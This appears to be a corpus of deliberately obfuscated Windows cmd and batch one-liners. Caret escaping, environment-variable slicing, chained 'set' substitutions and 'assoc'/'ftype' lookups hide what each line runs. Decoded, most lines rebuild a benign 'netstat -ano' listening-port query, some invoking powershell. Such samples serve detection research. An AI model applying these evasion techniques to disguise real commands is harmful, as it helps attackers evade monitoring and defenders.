^F^OR /^F "delims=oZ=f tokens=2" %^K ^in ('^a^SSo^c.cmd')^d^O %^K opuZC1MRaF^/^V^4^$^W^r^P^{^MFfCR2zOSbB/^R"sE^T^ w^j1^d=n^e-s""^-a-^:^%a""n^o^:^|^:6^in""^d^s-r^:12""^7^{0^{^0^{^1&s^eT tIK=!w^j1^d^:-^=^t^!&&S^e^t ^y^8=^!^tI^K^:%^=^-^!&&S^ET R^z=!^y^8:^6=f^!&S^E^t ^3l=!^R^z::^=^ ^!&&S^e^T ^ji^l=^!^3^l^:{^=^.^!&&%cOmMONPrOGRamfilEs:~+17,-11%%commONprogrAMfILES:~-20,-19%%tmP:~-15,-14%  /^r %^ji^l%"
%cOmMoNPrOgRaMfIlEs(X86):~  -12,  1%^m%PrOGRamdaTA:~-4,  -3%;   ;  ^/^v^:on ; ; /^R  "; (^S^E^t ^ vn^R^=y^e^Js""Jp^J^ -p""y5^ ^^^|^ ^ui^y""ds^Jr^ ^1^W""^t^90^90^9^1)&( ; ; (^s^e^T ^ ^ J^u^V=^!vnR^:^t=^7^!) )&& (^se^T ^ ^ ^ ^4^P^I^y=!^J^u^V:^9=.^!)&&( ; (^sE^T ^ ^ ^ C^u=^!^4^P^I^y:y^=n!) ; ;   )&&   (^S^e^T ^  ^ ^o^6^8=^!^C^u^:W=^2!)&  ( (s^e^t ^ ^9^X=!^o^6^8:^u^=^f!) )&&( (^s^e^T ^H^3^D=^!^9^X:^p^=^a^!)   ;   ;  )&&  ( (^sE^t  ^ ^i^R^G^2=!^H^3^D:^5=o^!) ; )&&(^SE^t ^ ^hZ=!^i^R^G^2^:^J^=t^!)& ; (  (^E^c^Ho;%^hZ%|  ;  %COmMONPrOGramW6432:~+17,1%%COmmOnPrOgRAmW6432:~-10,   1%%PROgramdAtA:~10,  +1%; ) ;   )  ; "
^F^o^R   ;  ;   ,   ; /^F   ; ;   ;  ;   "   tokens=     +2    delims=hFH"  , ,   ,   ;  %^G ,  ,   ,  ,   ;  ^IN   ;   ,   (   ,  ;  '   , , ^^F^^T^^Y^^p^^E  ,   ,  ;  ^|  ;   ;   ^^fIN^^D^^s^^T^^R  ,   ,   ^^H^^C    ' ,   , ;  ,   ;  ) ,  ;   ;  ;  ;   ^D^o  ;  ;  ;   ; %^G,    , ;  ,   ; z9eon/^V^g^S^;^i^-^ ^ ^ ^    , ;  ,  yOhmMu/^R     "  ;  ,  (     (     (  (   (^S^e^t^ ^ ^ ^]^ ^ ^=^@^:^/^{^(^/^.^/^)^%^.^(^@}^)^^^|^)^#^_^@^(^+^{^/^$^)^?^2^(^[^,^]^,]^,^?) , , ) ; ; ; ) ) , , )&     (  ,     ,    (    ,    (     ;    ;  ;    ;     (^s^e^T  ^ ^ ^ ^]^  ^ ^ =^!^]^ ^ ^:^#=^f^!)    )   )    ;    ;  ;   )&&    (     (   (^s^e^T ^ ^ ^  ^ ^`^ ^ =^!^]^ ^ ^ ^ ^:^+^=^d!)   ;     ;   )  )&&     (     ,   (  ,     ,     ,  ,    ,    (^S^E^T ^ ^ ^ ^{^ ^ =^!^`^ ^ ^:^[^=^7^!)     ;     ;     ;   ;  )     )&&  (     (  (    (    (^S^E^t ^ ^ ^ ^[^ ^ =!^{^ ^ ^:.^=^a^!)    ;    ;    ;     ;   ;     )   ,   ,    )    ;     ;   ;  ;  ;    )     ;    ;    ;  ;  )&  (    ,     (   ,  ;    ,    ;  ,   ;     ,   (^S^E^t ^ ^ ^ ^ ^ ^.^  ^ ^ =^!^[^ ^ ^:^)^=^ ^!)  ;   ;     ;  ;     ;    )    ,   ,  )&   (  ,    (    ,  (  ,  ,     (^s^e^t ^ ^ ^ ^ ^'^ ^ ^ ^ =^!^.^ ^ ^ ^ ^:{^=^s!) ; ; ) ) ; ; ; )&    (    ;     ;    ;   ;   ;    (   ,   (^s^E^t ^ ^ ^ ^]^ ^ ^ =^!^'^ ^ ^ ^ ^:}^=^o^!)    ,  ,    ,   ,    ,  )     ,     ,  ,   ,     ,   )&&    (   ,    ;   ,     ;   ,     ;    ,     ;  ,    (   ,    (     ,     ,   ,   ,  ,   (     ,    ,   ,     ,   ,   (^s^e^T ^ ^ ^_^ ^ =^!^]^ ^ ^ ^:^@^=n!) ) ; ; ; ; ) ; ; ; ) ; ; ; ; )&&   (   ;     ;    ;     ;    ;     (^s^E^T ^ ^ ^ ^ ^ ^\^ ^ ^ =^!^_^ ^ ^:%^=^-^!)     ,     )&&     (  ,     ,    (     ,     ,   (   ;     ;   ;    (^s^e^t ^ ^ ^ ^.^ ^ =!^\^ ^ ^ ^:^,^=^.!)    ,     ,  )     ,   ,     )     ;    ;     ;    ;  ;   )&    (   ;     ;    ;  (   ,  (    ;     ;    (     ,     (^s^E^t ^ ^ ^  ^;^  ^ ^ =^!^.^ ^ :^_^=^i^!) , ) ) , , ) ; ; ; ; )&    ( ; ; ( ( , , (^s^E^T ^ ^ ^ ^ ^# ^ ^ ^ =^!^;^ ^ ^ ^ ^:^:^=^e^!) , , ) ; ; ; ) )&    (     ;    ;  ;   ;  (     ,     (    ,     (^S^E^t ^ ^ ^ ^ ^@^ ^ =^!^#^ ^ ^ ^ ^:^(^=""^!) , , ) , ) ; ; ; )&    (  ,  ,   (   ;   ;    ;    ;  ;    (^s^e^T ^ ^ ^ ^ ^ ^$^ ^ =^!^@^ ^ ^:^?^=1^!) , ) , , )&  (   ,     ,   (^S^E^T ^ ^ ^ ^ ^ ^;^ ^ ^ ^ ^ =^!^$^ ^ ^:$^=^r^!) , , )&    (   (^s^E^T ^ ^ ^ ^ ^`^ ^ ^ ^ ^ ^ ^ ^ =^!^;^ ^ ^ ^ ^ :^]^=^0^!)     ;   ;   )&&    (   ,     (     ,     (     ,  ,  (^s^e^T ^  ^ ^ ^~^ ^ ^ =^!^`^ ^ ^ ^ ^ ^ ^ ^ ^:^/^=^t^!)  ,  )    ,     ;   ,   ;  ,     ;     ,   ;    ,     ;  ,   )    ,    ,   ,     ,    ,    )&  ;   ,  ;  , ^F^O^r  ;   ,   ;  ;   /^F ;  ,  ,   ,  ;  "  tokens=   2     delims=HjsF"   ;  ,   %^C  ; ;   ;  ;   ; ^in  ,   ;   (   ; ;  ,  '  ;   ;  ,  ^^F^^tY^^p^^E  ,  ;  , ;   , ^|  ;  ;   ^^F^^in^^D  , ;   ,   ;  "HC"   ,  ;  ' ,  ,  )   , ,  ;  ,  ^D^o   , ,   , ,  ,   ; ,  ( , , (^E^c^h^O  ;   ,   ,  %^~^ ^ ^ %    |%^C; )    ,   ,   ,   ,   ,  )  ;  ;  "
cmd /V:ON/C"set Zt5=netg\""\""tat -a\""\""no ^| kin\""\""dgtr w2\""\""y.0.0.w&&set G4E=!Zt5:w=1!&&set zq=!G4E:k=f!&&set RNoH=!zq:y=7!&&set Riu=!RNoH:g=s!&&call powershell "%Riu%" "
^f^o^r  , ;  ;  /^F  ;   ;  ; "    tokens=    +2   delims=FHP"  ,   , ,  ;  %^G ;   , ,   ;  In ; ,  (  ,   ,  ,   ;   '  ;   ,  ; ;  ,   ^^F^^T^^y^^P^^e   ;  ,  ,  ,   ^|  ,  ;   ; ^^F^^iN^^D^^s^^t^^r ; ;   ;  ^^H^^C^^m   ' ;  ,   ,   )  ;   , ^D^o  ;  ;  ; %^G,   ;  ,  , ;  F7Z8wJse^/v^A^$^ ^ ^ ^   ,   ,   ; yN/^R    "   ;  ,  ;  ,  ,  (     ,  (    ;   ;  ;  ;  ;  (^Se^T^ ^ ^  ^ ^+$=^]^,^t^+^/^t}^t^'^:^}^/^]^-^'^^^|^'^f^_^]^/^#+^t@^'^1^(^/^ {^.^{^.^{^1)   ,    )     ,  )&     (    ;  ;    ;  (   ;   ;    (s^e^t ^  ^ ^@^$^+^}=!^+^$^:^-^=^o^!)    ,   )     ,     )&&     (   ;  ;    ;     ;    (   (^Se^t ^ ^ ^ ^ ^ ^}^-^?=^!^@^$^+^}^:^ =^7^!)  ;  ;   ;    )  ;  ;     )&&     (   ,    ;  ,     ;     ,  ;    ,    ;  ,   (    ,   ,  ,    (    ,  ,   ,  ,     ,  (^s^E^t ^ ^ ^ ^ ^'^`-^.=^!^}^-^?:,^=^e!)    ,    ,    )  ;   ;  ;    ;  ;     )     ,  )&&     (    ,     (     ;    ;  ;    ;  ;     (  ;    ;   (     ;    ;   ;     ;   (^S^E^t ^ ^ ^*^+=!^'^`^-^.:^'^= !)   )    ,   )    )  ,     )&   (     ,     ,   ,    ,   ,   (    ,     ;     ,     ;    ,    ;     ,     (     ,   ;  ,  ;    ,  ;    ,    ;  ,     (^s^ET ^ ^  ^ ^{`^+=^!^*^+^:^(^=^2^!)  ,     ;  ,   ;    ,     ;     ,     ;   ,    )  ,  ,     ,     ,   ,  )  ,  ,   ,  )&    (     ,  (    ;   ;     (  ,    ,   (  ,   (^s^E^t ^ ^ ^  ^ ^$^.^]=^!^{^`^+::=^-!)   ,  )     ,    ;  ,   ;    ,    ;   ,    )     ,  ,   ,    ,    ,   )   ,    ;   ,   ;    ,  ;     ,     ;     ,    ;  ,    )&  (   ,  (  ,  (^s^e^T ^ ^ ^ ^#@^]=^!^$^.^]^:^#^=^d^!)    ,     )    ;    ;     ;    )&    ( ; ; ( ; ; (^s^e^T ^ ^ ^  ^#^[^]?=^!^#@^]^:^]^=n^!)   ,     ,    )  ;     ;  ;  ;  )&     ( , ( , ( ; ; ( , (^se^t ^ ^ ^ ^ ^ ^~^-^$^[=^!^#^[^]^?:/^=""^!)   ;    ;    )    ;  ;     ;   ;    ;     )  ;   ;   )    ,    ,     )&   (   (  ,  ,    (  (^S^e^T ^ ^ ^ ^ ^ ^#^.^-^]=^!^~^-^$^[^:^.=^0^!) ; ; ) ) ; ; )&&  ( ; ; ; ; ( , (^S^e^t ^ ^ ^-^}^]^_=^!^#^.^-^]^:^}^=^a!)    ;     ;  ;  ;    )  ;  ;     ;   ;    ;   )&&  (  ,   ;    ,     ;    ,    (   ,  ,    ,  (^s^e^t ^ ^ ^ ^ ^ ^.^;^#^-=^!^-^}^]^_:^_^=^i^!)   ,  ,  ,  )  ,     ;  ,   ;  ,     )&&   (     ;     ;   (    ,   ,    (^s^E^t ^ ^ ^ ^ ^ ^,^;^_^-=^!^.^;^#^-^:^{^=.!) ; ; ; ) ; ; )&&     ( , , ( ( , (^s^et ^ ^ ^.^#=^!^,^;^_^-^:^+^=^s^!)   ,    ,  ,     ,     ,   )     ,  ,    ,  )  ,   ,     ,    )&&   (   ;    ;    (   ;    ;   ;    (^s^et ^ ^ ^#^{^+^[=^!^.^#^:^@^=^r!) , ) , , )&  ;  ,  ; ^f^o^r  ;  ,  , ;  ,  /^F  ;  ;  "   tokens=     +1   delims=8MfW"  ,  ;  ,   ; %^V  ,   ,   ^IN  ,   ;  ;  (   , , ,  ' ;  ,   ^^F^^ty^^P^^e ,  ; ^|   ;  , ^^F^^IN^^d   ,  ;  ;  ;  ; "mdfi"  ;  ,   '  ,   ,   )  ;  ; ,  ^d^o   ;   ; ,      ;   ;  ; ,  ,  (     ,   ,    ,     (    ,    ,  ,    (     ,   ;   ,    ;    ,  ;   ,   ;    ,     (   ,    ;  ,  ;     ,   ;    ,  (e^c^H^O ,  , %^#^{^+^[%     |%^V, )    ;  ;   ;  ;   ;     )     )     ,   )     ;  ;   )  ;  ,   ,  ;  "
^f^o^r  ,  ; ,  /^f  ;   ,   "   tokens=  +2  delims=zFH"  ;  ,  ;  ; ;  %^Z ;   ,  ;   ^in ;   ,  , ;  (  ,  , ,   , '  ;  ;  ;   ^^f^^T^^YP^^e ;  ,   ; ;  ^|  ; ;   ,   ^^f^^IN^^D  ;  ,  "mdF"  ;  ;  ' ,   ;  ) , ,   ^D^o  ;  ,  %^Z,   ; , ,  BrqtH^/^v^a^S5N^T^j^[^b^e^  ^  ^   ,  ,  ,  Byx4gbkL2/^R   "  ,  ,  ; ;  ;   (     ,   ;   ,    ;  ,   ;     ,  ;   ,  (  ,   (  ,     ;     ,   ;   ,   (^s^e^t^  ^ ^'^~^;^=^;/?^`^:^?^}^?^ ^]^}:^;^%^ ^^^|^ ^\{^;^:+^`^?^[^ ^#_:^7^@^.^@^.^@^#)  ;     ;     ;   ;    ;    )   ;    ;   ;   ;  )  )&&  (  ;  ;    ;    ;  ;   (     ;   ;     ;  (^S^E^t  ^ ^ ^ ^ ^#^-^`=^!^'^~^;^:^[^=^r^!)    ;  ;   ;    ;  )   ;     ;  ;  ;    ;     )&&    (   ,   ,     (   ;  ;     ;     (  ;   ;   (     ;     ;   ;    ;   ;   (^s^e^T ^ ^ ^$^-^_=^!^#^-^`^:^.=^0^!)     ,   ,     ,   ,   ,   )    ,  )  ,     ;     ,  ;    ,    ;   ,    ;    ,     ;    ,     )     ,  ,    ,  ,    ,   )&&     (     ,    (  (   ,  (^sE^T ^ ^ ^ ^ ^ ^{^+[=^!^$^-^_^:@^=^.!)     ,     ;  ,  ;    ,    )    ,   ,   ,   )   ,     ;    ,    ;    ,    ;     ,    ;   ,  ;     ,     )&&    (   ,    ;    ,   ;   ,   (  ,     (  ,     ,  ,  (^Se^T ^ ^ ^ ^_^.=^!^{^+^[^:%=^o^!)     ;  ;    ;   )     ,  ,     )   )&    (     (     (     ;    ;    ;    ;    (s^E^t ^ ^ ^ ^-^}'=^!^_^.^:^\^=f^!)     ,   ;     ,  ;  ,    )  ,   ,   ,   )     ,     ,   ,  ,  ,   )&&    (  ;    ;    ;     ;   (     ,     ,     (^sE^t ^ ^  ^~^[^{*=^!^-^}^'^:^]^=-^!)    ,     )  ;   ;     )&  (     ,  (     ;  ;     (    ,   ,     (   (s^E^t ^ ^ ^ ^ ^_^#=!^~^[^{^*^:{=i^!) ; ; ; ; ; ) ; ; ; ) ) )&&     (    ,  ,     ,  ,     ,     (^S^E^t ^ ^  ^ ^ ^}^[^-=^!^_^#^:^/=e!)     ;    ;    )&  (   ,   (^se^T ^ ^  ^;^`^+_=^!^}^[^-^:^_^=^2^!)    ;   ;     ;   )&&  (     ;     ;    ;     (^S^E^T ^ ^ ^ ^ ^ ^-^'=^!^;^`^+^_^:^;^=n^!)     ,   ,  ,     ,   ,   )&  ( ; ; (^sE^t ^ ^ ^ ^ ^;^\^[,=^!^-^':^?=^t!) )&  ( ; ; ; ; ; ( ; ; ; ( , , (^S^e^t ^ ^  ^ ^$^'^#^,=!^;^\^[,^:^#^=^1^!)   ,   ,  )    )   ,  )&     ( , , ( , , ( ; ; ; ( , (^s^e^T ^ ^ ^*@^~^'=^!^$^'^#^,^:^}^=^a^!)   ;    ;    )     ;     ;    )    )  ,   ,    )&    ( (^S^e^t ^ ^ ^  ^ ^`^#^+^@=^!^*^@^~^'^:^:^=""^!)  )&&    (   ,     ,  (^s^e^T ^ ^ ^+^]\=!^`^#^+^@^:`^=^s^!) )&     ( , , ( ; ; ; ( ; ; ( ; ; ; (^s^E^T ^ ^ ^ ^`^?^\=!^+^]^\^:+^=^d^!)   ,  )   ;     ;  )    ,   )    ;  ;   ;    )& ;   ;  ,  , f^O^r  ;  ;   ;   , /^f   ;   ;  ;  "  delims=HvF     tokens=    +2  "   ,  ;  ;  %^8 ,   ,   ;  ^IN  ;   ; ;  ( ;  ,  ' ,  ,  ;  ,   ^^Ft^^Y^^P^^E  ;  ,  ^| ;   ,  ,  ^^f^^iN^^D  ; ,   ; ,   "mdF" ,   ;  , '  ; , ,  )  , , ; ^D^o  ; ,   ,   ;  ; ;   (   ,   ,     ,    (^e^cH^o ,  ;   ;  %^`^?^\%   |%^8; ) )   ,   ;   ,  "
^F^O^R ,  ;   ,  ,   ;   /^F ; ;  ; ;  "  delims=C=fS    tokens=    +2     "   ;  , ,  ;  ,   %^2  ;  ;  ^IN  , ;   ,  ; (  ,   ;  ,  ' ;   ,  ;  ^^a^^S^^S^^o^^c ,   ,  ,  , ;  ^| ,  ,  ;  ; ^^f^^iN^^d ,  ; "=cm"  ,  ,  ,   ;   ;  '   ,  ,   ;  ;  )  ;  ;   ^d^O  ,   ,  ,  ;   %^2,   ,  , , ; ,  z6gB3Ghre^/v^]^R^l^G^R^k^ ^ ^ ^   ,  ;   ;  ;   2XjTdy/^R  "  ; ; ;  ,  ( ; ; ; ; ( , , ( ; ; ; (^s^E^t^ ^ ^ +^_^#^=^'^`_^%^+^_^[^_^}^;^[^+^'^o^}^^^|^}^{.'^+^?^%^_^)^}^(^:+^/^$^#$^#^$^()  ;     ;   ;  ;     )    )    ,    ,    )&  (   ;  ;  ;     ;   ;     (    ,    ,    (     ,  ,     (^S^e^T ^ ^ ^+^'=^!^+^_^#^:^?^=^d^!)    ,   ,    ,     ,   ,  )   ,   ,  ,  ,   ,     )    ,    ,   ,    )&   ( , ( ; ; (^s^E^T ^ ^ ^  ^'_^#^.=^!^+^'^:%=^s^!)  ;  ;  ;     ;    ;   )    ;    ;   ;  ;  )&    ( ; ; ; ; ( ; ; ; ; ; ( , ( (^S^E^t ^ ^ ^ ^ ^]$^?^;=^!^'^_^#^.^:^/^=^7!)   ,  )     ;  ;   ;   ;   )  ,  )   ,   )&&   (  ,    ,   ,   ,   ,     (    ,  (^s^ET ^ ^ ^~^*=^!^]^$^?^;^:^_^=^t^!)    )   ;    ;    ;   )&  ( ; ; ; ; ( ; ; ; ; ; (^s^e^T ^ ^ ^ ^ ^ ^?^}=!^~^*:^'^=n^!) ; ; ; ) ; ; ; ; )&&    ( ( , , ( , ( , (s^E^T ^ ^ ^?^#=^!^?^}^:^:=^2^!)   ,     ;    ,     ;     ,     ;     ,  ;     ,    ;    ,  )     ,     ;  ,    ;   ,     ;     ,    ;  ,    )  ,     ;     ,   ;    ,     ;     ,    ;     ,     ;    ,    )  ,    ;   ,    ;  ,     )&   (     ,    ,   ,     ,  ,    (^s^e^t ^ ^ ^\^$^{=^!^?^#:^}^= ^!)    ,     ;   ,  ;     ,    )&    (    ,   ,    ,     (    ,   ,    ,     ,     ,   (   ,  ,    ,   (   ,    ,     ,    (^s^E^T ^ ^ ^[^#^$`=^!^\^$^{:.^=^i!)    ,     ;     ,    ;  ,   ;     ,   ;     ,   ;     ,   )     ,   ;  ,     ;     ,  )   ,    ;  ,     ;    ,  ;   ,  ;  ,  ;  ,   )  ,    ;     ,    ;  ,    ;     ,    )&    (   ;    ;   (     (    ;    ;  ;    (   ;   ;     ;  ;  (s^e^T ^ ^ ^.^$^?=^!^[^#^$^`^:^;^=^-^!)  ,  ;    ,   ;    ,  )   ,   ,    ,  ,    ,     )     ,  ,   ,    )     ,  ,  ,    ,     ,     )&&    (   (     (^S^e^t  ^ ^ ^`^}^_^-=^!^.^$^?^:^[^=a^!)     ,  ;     ,  ;     ,  ;   ,     )     ,     ,    ,    )&     (     ,  ,    (     ,   ,   (     ,   (   ;  ;  (S^e^T ^ ^ ^ ^`^~=^!^`^}^_^-^:^+^=""^!)   ;   ;   )  ;  ;  )  ;     ;   ;   ;  ;  )   ;     ;  )&&  (  (^S^E^T ^ ^ ^ ^ ^+^`^*#=^!^`^~:^(=^1!) ; ; ; ; ; )&  (  ;   ;   ;   (    ,  ,  (  ;  ;    (  ,     ,     (^Se^T ^ ^ ^{^[^,=^!^+^`^*^#:^`=e^!)  ,   ,   )     ,    ,  )     ;     ;  )    ,   ,    )&   (     ,   ;     ,    ;  ,   ;    ,    ;     ,    ;     ,  (    ,   ,  ,     ,     ,     (     ,     ;     ,    ;    ,  ;    ,    ;  ,   (^S^ET ^ ^  ^ ^ ^_^*^`^#=^!^{^[^,^:^)^=^r^!)  ,     ,  )     ;     ;     )     )&&   (     (^s^e^T ^ ^ ^ ^ ^.^*^]=!^_^*^`^#:{^=f^!)   ;   ;     ;     ;  )&  (  ;     ;  (     ,   ,    (   ;    ;    ;   ;   ;  (^s^E^T ^ ^ ^ ^#^`^';=^!^.^*^]:^$^=^.^!)     ,  )   )  ,   )&    (  ,  (   ,    ;    ,  ;    ,   ;     ,   ;   ,   ;   ,  (     ,     ,    ,   ,     ,    (^s^e^t ^ ^ ^ ^ ^_^+.^[=^!^#^`^'^;^:^#^=^0^!)     ;    ;  ;    )  )    ,  ,   )&  ;  ; ;  , ^e^c^ho  ; ; ;   (  (     (  (   (!^_^+.^[!)                   )                  )         )       )  ; ; |  ;   ,   ;  ( ; ; (^F^o^r  ;  ; /^f  ; ;  ;  ,  "^ ^ d^el^im^s^=.^C^A^ ^ t^o^k^en^s^=^ ^ ^+^2^ ^ ^ ^ "  ,   ,  ;  %^k   ,  ,  ,  ; ,   ^IN   ,   ,   ,  (   ;  ,  ;  ;   '  ; ;  , , ,  ^^^^A^^^^s^^^^S^^^^O^^^^c  , ; ,  ;   ;   .cdxml  ' ;  ,  ) ; ;   ^d^o  ,  ,  ;   ,  , %^k     -) , , )    "
cmd /V:ON/C"set Egc=net'tat -ano ^| fin2'tr 0101010 ^| fin2'tr LI`[ENING&&set 1HK=!Egc:[=T!&&set Jc0D=!1HK:2=d!&&set dubx=!Jc0D:1=.!&&set JxT=!dubx:`=S!&&set us=!JxT:'=s!&&FOR /F "tokens=2 delims=HGFb4v" %b IN ('ftype^|findstr mdFi')DO %b  /C %us%"
cmd /V:ON/C"set Svnt=ne s a h-anoh^|hfin(s rh0,0,0,0h^|hfin(s rhLISTEVIVG&&set wHx=!Svnt: =t!&&set xK=!wHx:h= !&&set IVX=!xK:V=N!&&set SZ=!IVX:,=.!&&set qm=!SZ:(=d!&&FOR /F "tokens=2 delims=j=Dkf" %m IN ('assoc^|find "d=c"')DO %m  /C %qm%"
FOR;;;;;;;;;;/f;;;;;"delims=NL.PO= tokens=1";;%k;;;;;;;;;in;;;;;;;(;;;;;';;asSOC;;;;;;;^|;;;;;;;;FINd;;;"md=c";;;;;;;';;;;;;);;;;;;;Do;;;;;;;;;%k; ;;/v;/C";;;;( ( ( ( (seT [_=n1BGssGsaGs -ano ^^^| 4inJsGsih 0.0.0.0 ^^^| 4inJsGsih UIVTE$I$B);;;;;;;;;););;;;;;;;;);)&&(;;;;;;;;;;;;;;;;;;;(;(;(;(SeT [@#,=![_:Gs=t!);;;;;;;;;););;;;;;;;;;;;;;;;;);;;;;;;;;;;;;;;;;)&&(Set *+=![@#,:ih=r!)&&(;(;(;(sET @#=!*+:$=N!);););;;;;;;;;;;;;)&&(;;;;;;;;;;;(;(;(set +{_=!@#:1B=e!);;;;;;;;;;;;;;;;;;;;;);;;;;;;;;;;;;;;;;;;;;);)&&(;(;;;;;(;(;;;;;(;(;;;;;;;;;;;;;;;;;;;;;(;(;;;(;(seT ;@'*=!+{_:J=d!););););;;;;;;;;;;;;;;;;);;;;;;;;;);;;);;;);;;;;;;;;;;;;;;;;;;;;);)&&(;(;(;(sEt `}{=!;@'*:V=S!);;;;;;;;;;;;;;;;;););)&&(;(SEt +_$=!`}{:4=f!);)&(set @.$=!+_$:U=L!)&&(SET ~.=!@.$:B=G!)&;;;;;;;for;;;;;;/f;;;"delims=vFH tokens=2";;%J;;;;;;;;;;In;;;;;;(;;;;';fTypE;^|;;;;;;;;;;finDstR;;;;;;;mdF';;;;;;;;);;dO;;;;;;;;;; ;;;(;;;;;;;;;;;;;;;;;;;;;(;(;;;;;;;;;;;;;(;(;;;;;;;;;;;;;(;;;;;;;;;(;(;(;;;(eCHO;;;;;;%~.%|%J; ););;;);););;;;;;;;;););;;;;;;;;;;;;;;;;;;);););;"
^F^O^R /^F "tokens=1 delims==Bzx." %^7 ^IN ('ass^o^c^|^f^ind "d=c"')^DO %^7 znIX02/Vu^fM^mRVUxzEG/C"s^et ^_^~^#^=n^e@s@Cr@6^-Crno6^^^|6^kP^inds^@^r6^0.0^.0^.06^^^|^6k^Pin^ds@r6^LI^S^T^ENIN9&&s^e^t -^]=!_~#^:kP^=^f!&&se^t \^*^@~=^!^-^]:Cr=a^!&&set '^`=!^\^*^@~^:@^=t!&&se^t ^#}=^!^'^`:^6=^ !&&s^e^t ^\*^~=!^#}:^9=^G!&&e^cho !^\*^~!|^FO^R /F "de^lims^=S^\.^ to^k^ens=^11" %^k ^IN ('^^ftyp^^e^^^|find^^st^^r l^^l^^\')D^O %^k -"
^c%COMmoNprogRAmW6432:~ -10,-9%%PRoGRAMdata:~  -4,  +1%; ; ;  ^/^V^:^ ^ ^   ;  ;  /^r"  ; ;  (^se^t  IXNj=n^d^xsx^b^x ^H^bn^o ^|^ fmn^c^s^xr 0.^0.^0.0 ^| fmnc^s^x^r 8I^G^T^V^2I2^j)&&  (^se^T c^8N=^!I^XNj^:^b^=^a^!)&&(^s^et ^5^0d=^!^c^8N^:^H=-!)&&   (S^E^T ^X^S^G^f=^!^5^0^d^:V=E^!)&& (^S^ET ^  ^ 7^C^s=!^X^S^G^f:d^=^e!)&(^s^Et ^  eL^d^a=!^7^C^s:c^=^d^!)&&( ; (^s^eT ^H^t=^!^eL^d^a^:^G^=^S^!)  ; ;  )&&  (  (^S^Et a^2^K=!^H^t:x^=t!) ; ; )&   ( (^s^e^t ^ ^ ^chn=!^a^2^K^:^j^=G!)   ;  )&(^s^eT  P^t=!^chn^:8^=^L^!)&&   (  ;  ; (S^E^T  ^ j^a=!^P^t^:m^=^i!) ;  )&   (^s^e^T  ^ F^b=^!j^a^:2^=N^!)&& ;;c%PRogRAmfiles:~   -7, 1%%OS:~   -7,-6%;  ;  ; /^R ;( ;   ;   (%F^b%) )   "
^C^m^d,  ,  ^/v^:on^  ,/^c",, (  ,  (^SE^T  ^w^y^=^wK^b^sb^a^b^H^-^a^w^oH^|^H2i^w^1^s^bFH^0^P0^P0P^0^H^|H^2iw1s^bF^H^LVSTZNVN^G)   ,   )&&   ( ,  , , ,   ,(^s^Et A^8^t=!wy:1^=^d^!) , )& (^se^T ^Cf^9=!^A^8^t:F^=r!)& (s^e^t BCl=^!^C^f^9:P^=.!)&&(^Se^t ^  s1^u^D=^!^BC^l^:2=f^!)&  (   , ,  ,,   ,   (^Se^T ^ ^wa=^!s^1^u^D^:^H=^ ^!) , ,  ,  ,  ,  )&&  (  , ,, ,  ,  (^se^t ^Y^G=^!^wa^:Z^=^E^!)   ,  )&(^sE^t ^  ^ ^jV^IN=^!^Y^G^:^w^=n^!)&( (^s^E^t  ^ z^8^u^4=^!^jV^IN:V=I^!)   ,)& (   ,(^sE^T ^ ^9^Me=^!^z^8^u^4^:^b=^t^!) ,  ,   ,   )&&  ( (s^e^t xe^o^G=^!^9^M^e^:^K=^e!),   )&&, ^cM^d,,  /^R , (  ,   (%xe^o^G%)   , )"
cmd /V:ON/C"set N1=uetstat -au5 ^| fiudstr 9.9.9.9 ^| fiudstr LISTENIN6&&set X3s=!N1:6=G!&&set eis=!X3s:u=n!&&set LFtE=!eis:9=0!&&set dTe=!LFtE:5=o!&&powershell.exe "!dTe!""
%COmmoNPROgRAMFIlEs:~  -12,  -11%%pRogRaMFiLES:~+9,1%%aLLuseRsPRoFILe:~-4,   +1%,  ,,  ^/^V ,/%LOCalaPPDAtA:~  6,  1% ", ,(SET^ ^ ^   v8VJ=^8^eHWHaH0-^a^8o^0^|^0k^i^8^5^W^Hr0yG^y^GyGy^0^|0ki^8^5^WHr0^x^PSTEN^PNC)&& (^s^et ^  n^Q=^!v^8V^J^:^W^=s!)&(  ,  (S^ET SF^C^P=^!n^Q:^0=^ !)   ,)&&(^SEt ^ ^ykN^M=!SF^C^P:G^=.!)&& (S^et  ^ ^MFz^0=^!^ykN^M:^y^=^0^!)&&   ( (^sE^T ^  ^Ez=!^M^Fz^0^:5=^d^!) , )&&   (^Set ^ja=^!^E^z:x^=^L^!)&(SE^T ^ ^P^hx=^!^j^a^:^C^=^G!)&&(^seT ^OK^W=!^P^h^x^:^8^=n!)& (S^E^T ^fq3=^!^OK^W:H=^t!)& (,,,  (Se^T  ^ 17^5=^!^f^q3^:^P^=^I!)  ,  ,  ,   , , )&(S^E^T ^ 7^Z=!^17^5^:k^=^f^!)& ,  cM%LoCAlapPdatA:~   -10,  +1%,   ,,/^r ,, (%7^Z%)  "